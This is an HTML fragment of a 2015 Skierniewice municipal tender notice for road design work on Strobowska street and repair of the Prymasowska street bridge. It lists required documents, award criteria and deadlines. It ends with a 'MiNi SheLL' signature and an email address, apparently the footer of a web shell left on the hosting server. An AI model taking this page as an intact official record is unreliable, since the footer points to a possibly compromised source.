<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Ofertę wykonawcy - wg wzoru stanowiącego załącznik nr 1 do SIWZ.

2. Potwierdzenie wniesienia wadium - wymagania dotyczące wadium zawarte zostały w pkt. 10 SIWZ.

3. Oświadczenie o uprawnieniach projektantów - wg wzoru stanowiącego załącznik nr 2 do SIWZ.

4. Oświadczenie o spełnianiu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 Ustawy - wg wzoru stanowiącego załącznik nr 3 do SIWZ.

5. Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy - wg wzoru stanowiącego załącznik nr 4 do SIWZ.
6. W przypadku składania oferty na część I lub część II zamówienia  - Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Wykaz musi potwierdzać, spełnienie warunku, o którym mowa w punkcie 7.1.2. SIWZ.
Wykaz należy sporządzić wg załącznika nr 5.

7. Dokumenty potwierdzające, że opracowania projektowe wymienione w punkcie 13.9 zostały wykonane należycie, wraz z podaniem wartości tych zamówień i potwierdzeniem:                                                                      
a) dla części I pozyskania decyzji o zezwoleniu na realizację inwestycji drogowej lub decyzji o pozwoleniu na budowę,
b) dla części II pozyskania decyzji o zezwoleniu na realizację inwestycji drogowej lub decyzji                            
    o pozwoleniu na budowę lub dokonania zgłoszenia wykonania robót budowlanych.

8. Pełnomocnictwo (gdy jest wymagane).
9. Wycenę poszczególnych opracowań dla części I zamówienia składającą się na cenę ryczałtową (dotyczy to tylko części I zamówienia) - wg zał. 6. 

10. Wycenę poszczególnych opracowań dla części I zamówienia składającą się na cenę ryczałtową (dotyczy to tylko części I zamówienia) - wg zał. 6. 
11. Informację o przynależności do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp wraz z listą podmiotów należących do tej samej grupy kapitałowej, lub informację o tym, że nie należy do grupy kapitałowej - wg wzoru stanowiącego załącznik nr 7 do SIWZ. 
12. W przypadku wykonawców występujących wspólnie na podstawie art. 23 ustawy do oferty należy dołączyć dokumenty: 
a) pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego, o którym mowa w art. 23 ustawy, 
b) dokumenty wymienione w punktach od 13.5 do 13.8 oraz 13.14 muszą być złożone przez każdy podmiot,                 
c) pozostałe dokumenty wymienione w pkt. 13 podmioty składają wspólnie jako konsorcjum,  d) w przypadku ofert składanych wspólnie warunki zawarte w pkt. 13 muszą być spełnione wspólnie lub przynajmniej przez jeden podmiot, o ile zamawiający nie zastrzegł inaczej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający może wyrazić zgodę na zmianę postanowień umowy pod warunkiem, że zmiany te nie będą niekorzystne dla Zamawiającego lub (w przypadku zmiany terminu realizacji zadania) wynikać będą z okoliczności nieprzewidzianych i niezawinionych przez Wykonawcę (np.: zwłoka lub odmowa 
w wydawaniu uzgodnień i pozwoleń przez odpowiednie urzędy, konieczność usunięcia błędów 
w dokumentacji projektowej). Zmiana postanowień umowy może być dokonana tylko poprzez zawarcie pisemnego aneksu pomiędzy stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice, Wydział Dróg i Komunikacji pok. nr 12 (wejście od Pl. Św. Floriana).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2015 godzina 11:30, miejsce: Urząd Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice, sekretariat pokój 14..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rozbudowa ulicy Strobowskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Orientacyjny opis zadania inwestycyjnego, na które opracowane mają być dokumentacje projektowe:
Rozbudowa ulicy Strobowskiej obejmuje co najmniej:
- wykonanie nowej jezdni (nowa podbudowa i nawierzchnia) o długości około 2,65 km,
- wykonanie ścieżki pieszo-rowerowej o długości około 2,65 km,
- wykonanie chodników, zatok parkingowych , zjazdów do posesji,
- wykonanie zatok postojowych dla autobusów,
- rozbudowę lub przebudowę skrzyżowań z drogami bocznymi,
- wykonanie odwodnienia ulicy. Wstępnie przewiduje się wykonanie kanalizacji deszczowej ze 
  skierowaniem wód do rzeki Łupi lub do zbiorników retencyjnych, a na odcinku ulicy wykonanie 
  rowów odwadniających. Długość kanalizacji deszczowej wyniknie z ustaleń koncepcji odwodnienia 
  z Zamawiającym. Rozwiązanie odwodnienia ulicy nastąpi po jego uzgodnieniu na etapie uzgadniania 
  koncepcji rozwiązań projektowych.   
- wykonanie oświetlenia ulicy na odcinku około 2,65 km: wykonanie nowego oświetlenia (słupów 
  i opraw) oraz przebudowę oświetlenia istniejącego,
- ewentualną przebudowę kolidujących z inwestycją mediów infrastruktury technicznej, w szczególności 
  linii elektroenergetycznej napowietrznej i podziemnej, wodociągu itp.

W ramach opracowania przedmiotu zamówienia Wykonawca pozyska pisemne zgody właścicieli/użytkowników działek prywatnych dotyczące wykonania nowych lub przebudowy istniejących zjazdów do posesji. 
Dla przybliżenia istniejącego wyposażenia terenu i jego otoczenia, załączono mapę zasadniczą (nieaktualną) terenu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont mostu w ulicy Prymasowskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Orientacyjny opis zadania inwestycyjnego, na które opracowane mają być dokumentacje projektowe:

Remont mostu w ulicy Prymasowskiej obejmuje co najmniej:
- rozebranie chodników, nawierzchni asfaltowej jezdni na moście, rozebranie belki podporęczowej 
  i gzymsów, 
  rozebranie schodów - zejść z mostu, rozebranie umocnień stożków i przyczółków, rozebranie balustrad 
  i barier ochronnych,
- wykonanie nowych belek podporęczowych i gzymsów, z wykonaniem kanałów technologicznych dla 
  umieszczenia istniejących mediów infrastruktury technicznej, lub wykonanie systemu podwieszenia dla   
  zainstalowania istniejących mediów infrastruktury technicznej,
- wykonanie izolacji kapy chodnikowej,
- wykonanie nowych chodników o nawierzchni izolowanej z żywic epoksydowych,
- ewentualne wykonanie/remont izolacji na płycie nośnej mostu - w przypadku potrzeby,
- uzupełnienie ubytków w płycie nośnej mostu oraz na podporach mostu, zabezpieczenie antykorozyjne 
  podpór mostu,
- remont skrzydeł mostu,
- umocnienie stożków i podpór skrajnych, 
- wykonanie nowej nawierzchni asfaltowej jezdni na moście i dojazdach,
- wykonanie nowego systemu odwodnienia z nawierzchni mostu z odprowadzeniem wód do rzeki Łupi,
- montaż nowych balustrad i barier lub barieroporęczy na moście i dojazdach,
- wykonanie nowych schodów - zejść z mostu z balustradami,  
- regulacja koryta rzeki pod mostem i na odcinkach wlotowym i wylotowym z umocnieniem brzegów 
  rzeki,
- usunięcie roślinności ze stożków i z bezpośredniego obrębu mostu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com